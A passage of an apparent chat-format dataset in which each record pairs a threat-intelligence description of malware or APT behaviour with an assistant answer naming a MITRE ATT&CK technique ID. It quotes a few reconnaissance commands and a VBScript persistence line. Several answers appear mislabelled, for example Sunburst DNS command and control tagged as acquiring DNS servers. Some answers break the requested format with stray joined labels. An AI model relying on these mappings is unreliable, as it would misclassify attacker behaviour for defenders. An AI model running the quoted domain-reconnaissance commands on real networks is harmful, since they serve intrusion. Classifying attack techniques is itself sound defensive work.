- Technique\". " }, { "role": "user", "content": "Turla has used \"net group \"Domain Admins\" /domain\" to identify domain administrators." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The library used to hide Winnti’s system activity is a copy of the open-source userland rootkit Azazel¹⁰, with minor changes. When executed, it will register symbols for multiple commonly used functions, including: open(), rmdir(), and unlink(), and modify their returns to hide the malware’s operations" }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla can install itself as a service on compromised machines." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool)." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can identify the installed antivirus engine." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet enumerates removable drives for infection." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs itself under Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use WMI queries to retrieve data from compromised hosts." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method" }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash', 'T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used batch scripts to enumerate users on a victim domain controller." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used FTP to exfiltrate collected data." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: “Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has encrypted documents and malicious executables." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao can use the \"ping\" command to discover remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server." }, { "role": "assistant", "content": "T1583.002 - DNS Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp encodes its second-stage payload with Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this particular case in 2013, the config file included an unknown plugin set, aside from the usual ‘ddos’ plugin listing" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes can alter the victim's proxy configuration." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: SecureWorks) NetWire logs keystrokes and peripheral inputs into encoded files in the C:\\Users\\ Figure 3" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects password policy information with the command \"net accounts\"." }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used RDP for direct remote point-and-click access." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE can exfiltrate collected data to its C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip source code. The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers. The DLL is compiled where the Name file of the Export Directory Table is “\"7-zip.dll\" and the Export Names are" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hi-Zor uses various XOR techniques to obfuscate its components." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can create a directory (C:\\ProgramData\\Mail\\MailAg\\gl) to use as a temporary directory for uploading files." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has been distributed via spearphishing as an email attachment." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain." }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\"." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dacls can establish persistence via a Launch Daemon." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moreover, USBWorm uses an icon that mimics a Windows directory, tricking the user into executing the malware when trying to access a directory" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has the ability to check running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can inject into a target process using process doppelgänging." }, { "role": "assistant", "content": "T1055.013 - Process Doppelgänging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During the first C&C call, the backdoor sends a pack with the victim’s system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware" }, { "role": "assistant", "content": "T1012 - Query Registry', 'T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of… ." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system" }, { "role": "assistant", "content": "T1546.011 - Event Triggered Execution: Application Shimming" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has created system services to execute cryptocurrency mining software." }, { "role": "assistant", "content": "T1569 - System Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy encrypts communications using AES256." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PingPull variants have the ability to communicate with C2 servers using ICMP or TCP." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 has self-propagation/lateral movement functionality (which requires user interaction) via mapped/available network shares or mounted USB devices" }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has used a scheduled task to launch its PowerShell loader." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SoreFang can decode and decrypt exfiltrated data sent to C2." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Scheduled tasks enable administrators to run tasks or “jobs” at designated times rather than every time the system is booted or the user logs in. This feature can be implemented via the Windows COM API, which the first versions of Ramsay have tailored. Based on the high ratio of similarity with Carberp’s implementation, it’s highly probable that Ramsay’s implementation was adapted from Carberp’s publicly available source code" }, { "role": "assistant", "content": "T1559.001 - Component Object Model', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Technet and Pastebin web pages for command and control." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mongall can use HTTP for C2 communication." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can set up an HTTP or SOCKS proxy." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been packed with the UPX packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload of is encrypted with simple XOR with a rotating key. The configuration file has been encrypted with RC4 keys." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sykipot has been known to establish persistence by adding programs to the Run Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant of ADVSTORESHELL encrypts some C2 with 3DES." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To run persistently on the system, the Trojan will first create a VBScript file:SpecialFolder.CommonApplicationData\\srvResesponded.vbs that contains:CreateObject(“WScript.Shell”).Run(“%app%”) The Trojan replaces the %app% string in the above VBScript with the path to its executable" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve" }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to capture audio from a victim machine." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT has the ability to extract data from removable devices connected to the endpoint." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto collects Keychain storage data and copies those passwords/tokens to a file." }, { "role": "assistant", "content": "T1555.001 - Credentials from Password Stores: Keychain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can download files to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mongall can use Base64 to encode information sent to its C2." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK is capable of performing keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of stealing Outlook passwords." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Open interactive python shells with auto-completion on the all-in-memory remote python interpreter" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The response to this request is hidden in the source code of following Flickr lookalike page" }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC', 'T1592 - Gather Victim Host Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method" }, { "role": "assistant", "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif droppers have used WMI classes to execute PowerShell commands." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "spear phishing campaigns have included malicious Word documents with DDE execution." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain 